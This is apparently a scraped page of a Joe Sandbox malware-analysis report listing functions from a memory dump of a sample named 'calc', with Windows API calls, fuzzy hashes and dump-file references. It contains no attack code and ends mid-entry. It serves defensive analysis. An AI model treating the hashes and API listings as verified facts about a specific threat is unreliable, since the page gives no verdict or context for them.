Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: TextWindow$BuffCharClassNameUpper
String ID:
API String ID: 4150757866-0
Opcode ID: d8c742284a62cca0cfe2f0d7f3300dba5fdb013f6cc35493e1cacb547e24c2a7
Instruction ID: 0584a30db60857092b00d2278fbf8332574566965ff49f28b8e04b70d15a5c85
Opcode Fuzzy Hash: d8c742284a62cca0cfe2f0d7f3300dba5fdb013f6cc35493e1cacb547e24c2a7
Instruction Fuzzy Hash: 19512172804549BEDB11DF50C945AEABBBCFF0431AF1480A7D405B2582DB38AF96CB94

Function 004080B0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0040811D
InvalidateRect.USER32(?,00000000,00000000,?,?,?), ref: 00408185

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Rect$InvalidateWindow
String ID:
API String ID: 2377233956-0
Opcode ID: fea54292c0e1d2534fd66d1e25aac67a1e4b5e63873669762bc16cc831050328
Instruction ID: 74dc3bcb53b80da343a71e2514c747408086c0bef610d4d3420c968f332f9c05
Opcode Fuzzy Hash: fea54292c0e1d2534fd66d1e25aac67a1e4b5e63873669762bc16cc831050328
Instruction Fuzzy Hash: DD416D71900609EFCB15DF64C981AAEB7B1FF44310F10416EEA62BB2D1DB74AD61CB58

Function 00406BB2 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00406C40
DestroyCursor.USER32(?), ref: 00406C50
DeleteObject.GDI32(?), ref: 00406C60
DestroyCursor.USER32(?), ref: 00406CA2

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CursorDeleteDestroyObject
String ID:
API String ID: 1476932828-0
Opcode ID: 1e5da546bdd14cc893a35634ba3a52cc5e227db2df9398bf0c0a04b3069a8235
Instruction ID: 5190c236cba640713588830f41552d92e9898bcea78dae1d236462c55c98861b
Opcode Fuzzy Hash: 1e5da546bdd14cc893a35634ba3a52cc5e227db2df9398bf0c0a04b3069a8235
Instruction Fuzzy Hash: C94193716043118FE724DF69D98896B77A8FF04315B16092FE982E3391C73DEC14CA99

Function 004309C0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,00431DC7,?,00000001,NULL Pointer assignment,00000001,?,0045C6D0,?), ref: 00430A01
VariantCopy.OLEAUT32(-00000068,?), ref: 00430A57
VariantCopy.OLEAUT32(-00000058,00000008), ref: 00430A6C
VariantCopy.OLEAUT32(-00000078,00000008), ref: 00430A81

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CopyVariant$ErrorLast
String ID:
API String ID: 2286883814-0
Opcode ID: 5af0195bfadb05a0c3b1fb0af8056b65b133b5ffb26115bf59ef324aa679a039
Instruction ID: 74ec36ade127758d2b5d6a60e7b2c92c59a7636115ccca8a5f9d65f218e57e45
Opcode Fuzzy Hash: 5af0195bfadb05a0c3b1fb0af8056b65b133b5ffb26115bf59ef324aa679a039
Instruction Fuzzy Hash: 85416D71900209DFCB00DF69D954A9BB7F8FF48304F1445AAE809E7362EB78AD45CB99

Function 004509A2 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004509C4

Part of subcall function 0044C6DB: RtlEnterCriticalSection.NTDLL(?), ref: 0044C703

__lock.LIBCMT ref: 00450A10
RtlEnterCriticalSection.NTDLL(0000008C), ref: 00450A5A
RtlLeaveCriticalSection.NTDLL(0000008C), ref: 00450A67

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CriticalSection$Enter__lock$Leave
String ID:
API String ID: 885841014-0
Opcode ID: bda5e73e630093f5bdc100a74ef8f2279113054be542c85dc4145b3eb02c6880
Instruction ID: 6b8fed09be344907abc40a60ecb9e95b28ef36bf5e0b8bb1f7086c56b98dbfe0
Opcode Fuzzy Hash: bda5e73e630093f5bdc100a74ef8f2279113054be542c85dc4145b3eb02c6880
Instruction Fuzzy Hash: 8D4133759003068BDB24DF64D88575E7BE0AF11329F25872FE832962D2CB389989CB0C

Function 0040C4BD Relevance: 6.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 0040C4DF
SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0040C544
Rectangle.GDI32(?,00000000,00000000,?,?), ref: 0040C596
EndPaint.USER32(?,?,?,?,?,?,?,00000000,00000000,?,?,?,?,00000000,00000001), ref: 0040C5EE

Part of subcall function 0040D03A: MoveToEx.GDI32(?,?,?,00000000), ref: 0040D047
Part of subcall function 0040D03A: LineTo.GDI32(?,?,?), ref: 0040D05A
Part of subcall function 0040D03A: LineTo.GDI32(?,?,?), ref: 0040D063
Part of subcall function 0040D03A: LineTo.GDI32(?,?,?), ref: 0040D06C
Part of subcall function 0040D03A: LineTo.GDI32(?,?,?), ref: 0040D075

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Line$Paint$BeginMoveRectangleViewport
String ID:
API String ID: 2658531208-0
Opcode ID: b5603e31384557df77967fefead3580476fc508b409ebf9dc0690b9044ca4220
Instruction ID: c6e67966df92c8fb1309ec1158f403bbbcdfb1cf059d0a129d19c9ce180b40a5
Opcode Fuzzy Hash: b5603e31384557df77967fefead3580476fc508b409ebf9dc0690b9044ca4220
Instruction Fuzzy Hash: E3418C34500214FFDB109F65CC84BEEBBB5AF04720F1442AAE955AB2E2C778AD86DB14

Function 00457BDC Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0044D99A: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0044D9B4
Part of subcall function 0044D99A: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0044D9C5
Part of subcall function 0044D99A: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0044DA0B

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,0045BBD8,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457C22
MultiByteToWideChar.KERNEL32(00000000,00000009,00000018,?,00000000,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457C3F
MultiByteToWideChar.KERNEL32(00000000,00000001,00000018,?,?,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457CB5
CompareStringW.KERNEL32(?,00000002,0045BBD8,00000000,?,00000000,?,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000), ref: 00457CCB

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
String ID:
API String ID: 1997773198-0
Opcode ID: fa278a9fb141195142809aa7d3f30c700e43bec3de6b395ff456d9aed322e878
Instruction ID: a5633a3a0502486586b9ec731d308d5a0470a2ef10469a9c99ac855557056afc
Opcode Fuzzy Hash: fa278a9fb141195142809aa7d3f30c700e43bec3de6b395ff456d9aed322e878
Instruction Fuzzy Hash: 58319031800208EBEF22DFA0EC45BDEBBB6FF04715F24012AF915AA2A1C7398D55DB04

Function 00450CF4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0044D99A: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0044D9B4
Part of subcall function 0044D99A: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0044D9C5
Part of subcall function 0044D99A: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0044DA0B

WideCharToMultiByte.KERNEL32(?,00000000,004014B8,?,?,?,00000000,00000000,?,004490FC,?,00000000,0047BCF4,?,?), ref: 00450D32
LCMapStringA.KERNEL32(?,00000100,?,?,00000000,00000000,?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450D4E
LCMapStringA.KERNEL32(?,00000100,?,?,?,00000000,?,004490FC,?,00000000,0047BCF4,?,?,?,?,004014B8), ref: 00450DBA
_strncpy.LIBCMT ref: 00450DDF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: QueryStringVirtual$ByteCharInfoMultiSystemWide_strncpy
String ID:
API String ID: 1411509361-0
Opcode ID: 50d250bda05586ae445ed1552c3c1dda67e35146d19ca7e5a6580e82283b142e
Instruction ID: a8fa9c9e81d149e0fd57e576100391c0807143c9fde817d248a89193a1360640
Opcode Fuzzy Hash: 50d250bda05586ae445ed1552c3c1dda67e35146d19ca7e5a6580e82283b142e
Instruction Fuzzy Hash: 1F315B76C0011AEBDF119F95CC829EFBBB5EF08316F18852AF92062162C7394D56DF98

Function 00405D95 Relevance: 6.1, APIs: 4, Instructions: 91windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00405DB3
GetWindowRect.USER32(00000003,?), ref: 00405DFC
PtInRect.USER32(?,00000000,000000FF), ref: 00405E0C
MessageBeep.USER32(00000000), ref: 00405E7F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: dcf3ca20a4c2ae2ed243af5031a055c5e736d4f7eb66e569f9db8ee6816ab8dd
Instruction ID: dd8de1245b502091c838f5f47c16c6050819199c23e6a8110bf6000abb39bdf8
Opcode Fuzzy Hash: dcf3ca20a4c2ae2ed243af5031a055c5e736d4f7eb66e569f9db8ee6816ab8dd
Instruction Fuzzy Hash: FF310631900619EFCB10CFA8C848AABBBF4EF04355F14456AE9A5B62D0D338AE45CF95

Function 0041181E Relevance: 6.1, APIs: 4, Instructions: 84keyboardwindowCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(00000011,00000000), ref: 00411831
GetKeyboardState.USER32(?), ref: 0041186B
SetKeyboardState.USER32(00000080), ref: 00411880
PostMessageW.USER32(?,00000100,00000011,00000000), ref: 004118D4

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: KeyboardState$MessagePostVirtual
String ID:
API String ID: 863366817-0
Opcode ID: bfb4b78a6aaed89bb3859a60d9aecc9fb928bdbecd9a5f803ab5092cb477fe57
Instruction ID: 51936c8d46dd67df7a5012feef2705db3bfc497a99d119d8ced5b6907d56545e
Opcode Fuzzy Hash: bfb4b78a6aaed89bb3859a60d9aecc9fb928bdbecd9a5f803ab5092cb477fe57
Instruction Fuzzy Hash: BD212F71A003157BEB3567698CC8BE76A5CAB05355F10413BF74991272D7ACDCC0C29D

Function 00411916 Relevance: 6.1, APIs: 4, Instructions: 84keyboardwindowCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(000000A0,00000000), ref: 00411929
GetKeyboardState.USER32(?), ref: 00411967
PostMessageW.USER32(?,00000101,000000A0,00000000), ref: 004119C1
SetKeyboardState.USER32(?), ref: 004119D8

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: KeyboardState$MessagePostVirtual
String ID:
API String ID: 863366817-0
Opcode ID: a81da1ac17faf62712921bae63e7622cf4e8409ec3e79e3e80d14285f257a8ae
Instruction ID: 9c36f65ea7ddc444ccb7cc2cff4a635faba03942e7bfa2e0ea98a349dbe43b6b
Opcode Fuzzy Hash: a81da1ac17faf62712921bae63e7622cf4e8409ec3e79e3e80d14285f257a8ae
Instruction Fuzzy Hash: 892137B17102187AEB314768CC99FEB6A5CDB06394F540127F669922B2C2ADCCC1C6AC

Function 0042F490 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0042F4F2
__WSAFDIsSet.WS2_32(00000000,00000001), ref: 0042F50C
accept.WS2_32(00000000,00000000,00000000), ref: 0042F51F
WSAGetLastError.WS2_32(00000000,00000000,00000001,00000000,00000000,?), ref: 0042F528

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 755a0d37a7a288ac79227b46faa216e6589971c12026bb35bcb87805b5d0fce9
Instruction ID: c4cb769e5f6c09977091af05dbcfb972cb8144af55259ba7b3911f342b50bbba
Opcode Fuzzy Hash: 755a0d37a7a288ac79227b46faa216e6589971c12026bb35bcb87805b5d0fce9
Instruction Fuzzy Hash: E911E171A00118ABDB15EF2ADC819EFB7FCAB49714F40427FB405D3242DA789E808BA4

Function 0042003A Relevance: 6.1, APIs: 4, Instructions: 70windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00420064
TranslateMessage.USER32(?), ref: 0042008B
DispatchMessageW.USER32(?), ref: 00420095
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004200A5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 9024c2977bfdbd5ac00eb1186ad899a131a143131b69003cd44eda1b14e214a5
Instruction ID: d6d8623c54d9b74e91df51d2b51a13610eb9f86121000978df8a1a571116bf05
Opcode Fuzzy Hash: 9024c2977bfdbd5ac00eb1186ad899a131a143131b69003cd44eda1b14e214a5
Instruction Fuzzy Hash: 3B1187B2A053559EEB119BB4BC88BB77BECA701309F44843AD152D3102E778D84ADB79

Function 0044B66E Relevance: 6.1, APIs: 4, Instructions: 69threadCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0044B696
RtlExitUserThread.NTDLL(00000000), ref: 0044B6A5
FlsGetValue.KERNEL32(0045B188,0000000C), ref: 0044B6BE
FlsSetValue.KERNEL32(?), ref: 0044B6D4

Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C6BF,00000000,0045B3A0,00000008,0044C6F4,?,?,?,00449A5F,00000004,0045B068,0000000C), ref: 00449CED

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Value$CloseExitFreeHandleHeapThreadUser__lock
String ID:
API String ID: 3768287693-0
Opcode ID: 261bbbb13ab97ef48b6273567e7550b14a6623c728018b4c2deabfd67cee4d94
Instruction ID: d4f00fcacf70c5f03d956f577aab7a395bcd786e41b93a042494b8fd7fe282cd
Opcode Fuzzy Hash: 261bbbb13ab97ef48b6273567e7550b14a6623c728018b4c2deabfd67cee4d94
Instruction Fuzzy Hash: F1219631500B00EFE724AF65D94AA6A37A4FF44755F11451EF845973A1DF78EC00CA9A

Function 00403C97 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00403CA0
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00403CBF
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00403CDD
CharUpperBuffW.USER32(?,00000000), ref: 00403CFB

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow
String ID:
API String ID: 2796087071-0
Opcode ID: 11bfcdc27317c56bf8c93ba2187fac7942afcc668f3ade450d01a30b8132c5b6
Instruction ID: 5bedeb9e09b6abb0eb7ebfe7bc79414f8d824c24300506fe996c0fb54aef253c
Opcode Fuzzy Hash: 11bfcdc27317c56bf8c93ba2187fac7942afcc668f3ade450d01a30b8132c5b6
Instruction Fuzzy Hash: 1011B232904258BAFF229FA1DC06F9B7F6DDF40725F20407AF800A51A1DB79CE50A758

Function 0040CF77 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

MoveToEx.GDI32(?,00000000,00000001,00000000), ref: 0040CFC3
_logf.LIBCPMT ref: 0040CFD6
_logf.LIBCPMT ref: 0040CFF4
LineTo.GDI32(?,?,00000001), ref: 0040D010

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: _logf$LineMove
String ID:
API String ID: 2044247434-0
Opcode ID: 7b0958b1e05d44bb2692c91de32216addb6b67a0baac5db24a1264da40054095
Instruction ID: 36068e2f271c58dd6b3b91538d1304b6c8909b614552cdb76d913315e2bc621b
Opcode Fuzzy Hash: 7b0958b1e05d44bb2692c91de32216addb6b67a0baac5db24a1264da40054095
Instruction Fuzzy Hash: E421EF72900209EFCB00AF91EB499AEBF74FB00351F2144A9E981721A5D7748E30EB5A

Function 0044AFC4 Relevance: 6.1, APIs: 4, Instructions: 65threadCOMMON

Download Yara Rule

APIs

